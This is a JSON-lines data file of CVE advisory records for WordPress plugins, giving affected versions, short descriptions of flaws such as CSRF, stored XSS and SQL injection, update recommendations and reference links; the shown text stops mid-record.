{"CVE_ID":"CVE-2023-29428","slug":"superb-social-share-and-follow-buttons","versionImpact":"1.1.3","versionEndExcluding":"1.1.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in SuPlugins Superb Social Media Share Buttons and Follow Buttons for WordPress plugin <=\u00a01.1.3 versions.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/superb-social-share-and-follow-buttons\\\/wordpress-superb-social-media-share-buttons-and-follow-buttons-plugin-1-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/superb-social-share-and-follow-buttons\\\/wordpress-superb-social-media-share-buttons-and-follow-buttons-plugin-1-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1331","slug":"redirect-redirection","versionEndExcluding":"1.1.5","description":"The Redirection WordPress plugin before 1.1.5 does not have CSRF checks in the uninstall action, which could allow attackers to make logged in admins delete all the redirections through a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81d9340-cf7e-46c4-b669-e61f2559cb8c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81d9340-cf7e-46c4-b669-e61f2559cb8c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-38057","slug":"th-advance-product-search","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin.This issue affects Advance WordPress Search Plugin: from n\/a through 1.2.1.\n\n","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-40218","slug":"th-advance-product-search","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin.This issue affects Advance WordPress Search Plugin: from n\/a through 1.1.4.\n\n","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7518","slug":"rsfirewall","versionImpact":"1.1.42","versionEndExcluding":"1.1.43","description":"The RSFirewall! plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.1.42 via the get_local_filename() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.1.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306173%40rsfirewall&new=3306173%40rsfirewall&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306173%40rsfirewall&new=3306173%40rsfirewall&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7b0eef-3b8e-4272-bbd7-ad52088d0835?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7b0eef-3b8e-4272-bbd7-ad52088d0835?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5161","slug":"magical-addons-for-elementor","versionImpact":"1.1.39","versionEndExcluding":"1.1.40","description":"The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 1.1.39 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.40, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb64952e-170e-47c5-87fd-d2ec60192b65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb64952e-170e-47c5-87fd-d2ec60192b65?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magical-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/advance-skill-bars.php#L502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magical-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/advance-skill-bars.php#L502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098054%40magical-addons-for-elementor&new=3098054%40magical-addons-for-elementor&sfp_email=&sfph_mail=#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098054%40magical-addons-for-elementor&new=3098054%40magical-addons-for-elementor&sfp_email=&sfph_mail=#file9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2967","slug":"tinymce-custom-styles","versionEndExcluding":"1.1.4","description":"The TinyMCE Custom Styles WordPress plugin before 1.1.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9afec4aa-1210-4c40-b566-64e37acf2b64\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9afec4aa-1210-4c40-b566-64e37acf2b64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6030","slug":"logdash-activity-log","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The LogDash Activity Log WordPress plugin before 1.1.4 hooks the wp_login_failed function (from src\/Hooks\/Users.php) in order to log failed login attempts to the database but it doesn't escape the username when it perform some SQL request leading to a SQL injection vulnerability which can be exploited using time-based technique by unauthenticated attacker","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b658e403-006c-4555-b1b2-3603e44f4411\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b658e403-006c-4555-b1b2-3603e44f4411\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8965","slug":"absolute-reviews","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The Absolute Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Name' field of a custom post criteria in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12cfebb8-ae89-410b-a492-340f1553e83e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12cfebb8-ae89-410b-a492-340f1553e83e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156409\\\/absolute-reviews\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156409\\\/absolute-reviews\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11265","slug":"wp-maximum-upload-file-size","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The Increase Maximum Upload File Size | Increase Execution Time plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.1.3. This is due to returning image upload error messages with full path information. This makes it possible for authenticated attackers, with author-level permissions and above, to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/tags\\\/1.1.2\\\/inc\\\/class-wmufs-chunk-files.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/tags\\\/1.1.2\\\/inc\\\/class-wmufs-chunk-files.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/trunk\\\/inc\\\/class-wmufs-chunk-files.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/trunk\\\/inc\\\/class-wmufs-chunk-files.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191874\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191874\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49e7cdf-93ca-415f-ba83-986cbb869220?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49e7cdf-93ca-415f-ba83-986cbb869220?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7484","slug":"crm-perks-forms","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The CRM Perks Forms plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'handle_uploaded_files' function in versions up to, and including, 1.1.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02c6ec97-50cc-4c61-9bb7-b94250d5dda3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02c6ec97-50cc-4c61-9bb7-b94250d5dda3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-perks-forms\\\/trunk\\\/includes\\\/front-form.php?rev=3003885#L3271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-perks-forms\\\/trunk\\\/includes\\\/front-form.php?rev=3003885#L3271\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016768\\\/crm-perks-forms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016768\\\/crm-perks-forms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4459","slug":"wp-show-posts","versionEndExcluding":"1.1.4","description":"The WP Show Posts WordPress plugin before 1.1.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ef4783b-4e4a-4691-b858-a7fa8dada4ec\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ef4783b-4e4a-4691-b858-a7fa8dada4ec\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1330","slug":"redirect-redirection","versionEndExcluding":"1.1.4","description":"The Redirection WordPress plugin before 1.1.4 does not add nonce verification in place when adding the redirect, which could allow attackers to add redirects via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de4cff6d-0030-40e6-8221-fef56e12b4de\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de4cff6d-0030-40e6-8221-fef56e12b4de\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3604","slug":"change-wp-admin-login","versionEndExcluding":"1.1.4","description":"The Change WP Admin Login WordPress plugin before 1.1.4 discloses the URL of the hidden login page when accessing a crafted URL, bypassing the protection offered.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f6615e8-f607-4ce4-a0e0-d5fc841ead16\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f6615e8-f607-4ce4-a0e0-d5fc841ead16\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6598","slug":"speedycache","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The SpeedyCache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the speedycache_save_varniship, speedycache_img_update_settings, speedycache_preloading_add_settings, and speedycache_preloading_delete_resource functions in all versions up to, and including, 1.1.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin options.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db8cfdba-f3b2-45dc-9be7-6f6374fd5f39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db8cfdba-f3b2-45dc-9be7-6f6374fd5f39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010577\\\/speedycache\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010577\\\/speedycache\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4943","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to a missing capability check on the woobe_bulkoperations_visibility function. This makes it possible for authenticated attackers (subscriber or higher) to manipulate products.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d10475f-83dd-4e59-83e4-aeaa72a22b96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d10475f-83dd-4e59-83e4-aeaa72a22b96?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4942","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_visibility function. This makes it possible for unauthenticated attackers to manipulate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26d8b75b-befa-4c6a-b072-0da44e437174?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26d8b75b-befa-4c6a-b072-0da44e437174?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4940","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_swap function. This makes it possible for unauthenticated attackers to manipulate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c5e524-ef4d-48c7-baa0-595f8060a167?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c5e524-ef4d-48c7-baa0-595f8060a167?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4937","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_apply_default_combination function. This makes it possible for unauthenticated attackers to manipulate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40bf51bf-efb2-4504-815b-4681d1078f77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40bf51bf-efb2-4504-815b-4681d1078f77?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4935","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the create_profile function. This makes it possible for unauthenticated attackers to create profiles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639f3941-7783-4500-aca4-5e8155db6460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639f3941-7783-4500-aca4-5e8155db6460?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php#L191\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fclasses%2Fmodels%2Fprofiles.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fclasses%2Fmodels%2Fprofiles.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4920","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_save_options function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Additionally, input sanitization and escaping is insufficient resulting in the possibility of malicious script injection.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/index.php?contextall=1&old=2968292&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Findex.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/index.php?contextall=1&old=2968292&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Findex.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58d25eeb-b12c-4850-8308-eaa30982b5a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58d25eeb-b12c-4850-8308-eaa30982b5a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/index.php#L805\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/index.php#L805\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13542","slug":"wp-google-street-view","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The WP Google Street View (with 360\u00b0 virtual tour) & Google maps + Local SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgsv' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227140%40wp-google-street-view&new=3227140%40wp-google-street-view&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227140%40wp-google-street-view&new=3227140%40wp-google-street-view&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b1944a9-4bc4-4ac2-83c3-55d6d61f405c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b1944a9-4bc4-4ac2-83c3-55d6d61f405c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4962","slug":"video-popup","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The Video PopUp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'video_popup' shortcode in versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/670ea03e-2f76-48a4-9f40-bc4cfd987a89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/670ea03e-2f76-48a4-9f40-bc4cfd987a89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-popup\\\/trunk\\\/features\\\/shortcode.php?rev=2928708#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-popup\\\/trunk\\\/features\\\/shortcode.php?rev=2928708#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3004434\\\/video-popup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3004434\\\/video-popup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5686","slug":"wpzoom-elementor-addons","versionImpact":"1.1.38","versionEndExcluding":"1.1.39","description":"The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 attribute within the plugin's Team Members widget in all versions up to, and including, 1.1.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.39, or a newer patched 